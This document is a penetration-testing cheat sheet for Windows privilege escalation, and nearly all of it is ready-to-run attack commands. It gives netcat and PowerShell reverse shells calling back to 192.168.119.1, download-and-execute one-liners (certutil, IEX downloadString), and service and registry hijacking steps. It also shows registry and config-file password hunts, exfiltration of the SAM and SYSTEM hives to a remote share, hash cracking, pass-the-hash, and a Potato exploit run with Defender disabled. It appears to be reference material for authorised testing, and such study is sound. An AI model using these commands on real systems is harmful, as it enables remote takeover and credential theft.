Windows Privilege Escalation

This page provides a comprehensive guide for Windows privilege escalation and exploitation techniques, including practical commands, tools, and tips. Use these methods to enumerate, exploit, and escalate privileges on Windows systems during penetration testing.

Shell Handling Techniques

Reverse Shell

• Basic reverse shell using nc.exe:

nc.exe 192.168.119.1 443 -e cmd.exe

• From a network share:

\\192.168.119.1\a\bin\nc.exe 192.168.119.1 443 -e cmd.exe

• PowerShell reverse shell:

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("192.168.119.1",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

• Shorter PowerShell variant:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.119.1',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Basic System Enumeration

whoami
systeminfo

Or from a share:

\\192.168.119.1\a\bin\whoami.exe

Downloading Tools

certutil -URLcache -f http://192.168.119.1:8080/t/tool.exe tool.exe
powershell -c "Invoke-Webrequest -OutFile tool.exe -Uri http://192.168.119.1:8080/t/tool.exe"
powershell -c "IEX(New-Object Net.WebClient).downloadString('http://192.168.119.1:8080/t/tool.ps1')"
copy /B \\192.168.119.1\a\t\winPEASany.exe winPEASany.exe
copy /B \\192.168.119.1\a\bin\nc.exe nc.exe
copy /B \\192.168.119.1\a\bin\accesschk.exe accesschk.exe
copy /B \\192.168.119.1\a\bin\plink64.exe plink64.exe

Automated Enumeration Tools

winPEAS

• winPEAS Download

copy /B \\192.168.119.1\a\t\winPEASany.exe winPEASany.exe
./winPEASany.exe

Seatbelt

• Seatbelt Download

SharpUp

• SharpUp Download

PowerUp

• PowerUp.ps1

Powerless.bat

• Powerless.bat

accesschk.exe

• accesschk.exe (phackt)
• accesschk.exe (ankh2054)

Service Exploitation

• HackTricks: Windows Service Privilege Escalation

Service Enumeration & Manipulation

sc.exe qc <name>         # Query service config
sc.exe query <name>      # Query service status
sc.exe config <name> <option>= <value>  # Change config (note space after '=')
net start <name>         # Start service
net stop <name>          # Stop service

winPEASany.exe quiet servicesinfo

Insecure Service Properties

• Modify Service Binary Path

accesschk.exe /accepteula -ucqv <name>
# Look for SERVICE_CHANGE_CONFIG, SERVICE_START, SERVICE_STOP
sc qc <name>
# Look for SERVICE_START_NAME : LOCALSYSTEM
sc config <name> binpath= "C:\rs.exe"
net stop <name>
net start <name>

Unquoted Service Paths

• Unquoted Service Paths

accesschk.exe /accepteula -uwdq "C:\Program Files\Some Folder\Service.exe"
# Look for RW BUILTIN\USERS
copy rs.exe "C:\Program Files\Some.exe"
net stop <name>
net start <name>

Weak Registry Permissions

• Modify Service Registry Permissions

get-acl HKLM:\System\CurrentControlSet\services\<name> | Format-List
accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\services\<name>
accesschk.exe /accepteula -ucqv <name>
# Look for SERVICE_CHANGE_CONFIG, SERVICE_START, SERVICE_STOP
reg query HKLM\System\CurrentControlSet\services\<name>
reg add HKLM\SYSTEM\CurrentControlSet\services\<name> /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f
net stop <name>
net start <name>

Insecure Service Executables

• Service Executable Permissions

accesschk.exe /accepteula -quvw <path>
# Look for RW EVERYONE
accesschk.exe /accepteula -uvqc <path>
copy <path> c:\Temp
copy /Y rs.exe <path>
net stop <name>
net start <name>

DLL Hijacking

• DLL Hijacking

Password & Credential Attacks

winPEASany.exe quiet fileinfo userinfo

Password Leak in Registry

reg query HKLM /f password /t REG_SG /s
reg query HKCU /f password /t REG_SG /s

Winexe (Remote Command Execution)

winexe -U 'admin%adminpassword' //10.10.10.10 cmd.exe
winexe -U 'admin%adminpassword' --system //10.10.10.10 cmd.exe

Saved Credentials

winPEASany.exe quiet cmd windowscreds
cmdkey /list
runas /savecred /user:admin rs.exe

Config Files

winPEASany.exe quiet cmd searchfast fileinfo
dir /s *pass* == *.config
findstr /si password *.xml *.ini *.txt

Security Password Manager

copy C:\Windows\Repair\SAM \\192.168.119.160\a\
copy C:\Windows\Repair\SYSTEM \\192.168.119.160\a\
cd creddump7
python2 pwdump.py SYSTEM SAM
# admin:1004:aad3b4...:<hash>:::
hashcat -m 1000 --force <hash> /usr/share/wordlists/rockyou.txt

Passing Password Hash

pth-winexe -U 'admin:1004:aad3b4...:<hash>' //10.10.10.10 cmd.exe
pth-winexe --system -U 'admin:1004:aad3b4...:<hash>' //10.10.10.10 cmd.exe

Potato Exploits

• Potato Exploit Overview

Hot Potato

• Potato.exe Download

Potato.exe -ip 192.168.119.160 -cmd "rs.exe" -disable_exhaust true -disable_defender true -enable_httpserver true -enable_spoof true

Kernel Exploits

• Windows Kernel Exploits (SecWiki)
• WES-NG: Windows Exploit Suggester

systeminfo > \\192.168.119.160\a\systeminfo.txt
python wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only | less

Active Directory (AD) Attacks

• Active Directory Exploitation Cheat Sheet

Further Reading & References

• Udemy: Windows Privilege Escalation
• Japanese: Privilege Escalation Memo
• Japanese: Privilege Escalation Exploit Windows